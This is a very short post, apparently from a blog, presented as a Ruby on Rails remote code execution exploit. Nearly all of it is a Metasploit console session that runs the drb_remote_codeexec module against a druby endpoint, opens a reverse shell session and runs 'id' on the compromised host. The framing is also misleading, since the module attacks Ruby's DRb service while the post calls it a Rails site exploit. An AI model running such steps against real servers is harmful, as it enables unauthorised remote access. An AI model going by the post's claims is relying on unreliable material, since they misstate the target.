Ruby on rails remote code execution exploit

Ruby on rails websites are highly vulnerable.

Exploiting a rails site looks like this:

$ msfconsole
msf> use exploit/linux/misc/drb_remote_codeexec
msf  exploit(drb_remote_codeexec) > set URI druby://localhost:45074
msf  exploit(drb_remote_codeexec) > exploit
[*] Started reverse double handler
[*] trying to exploit instance_eval
< snip >
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:53299) at 2013-01-09 13:06:39 -0600
id
uid=1001(www) gid=1001(www) groups=1001(www)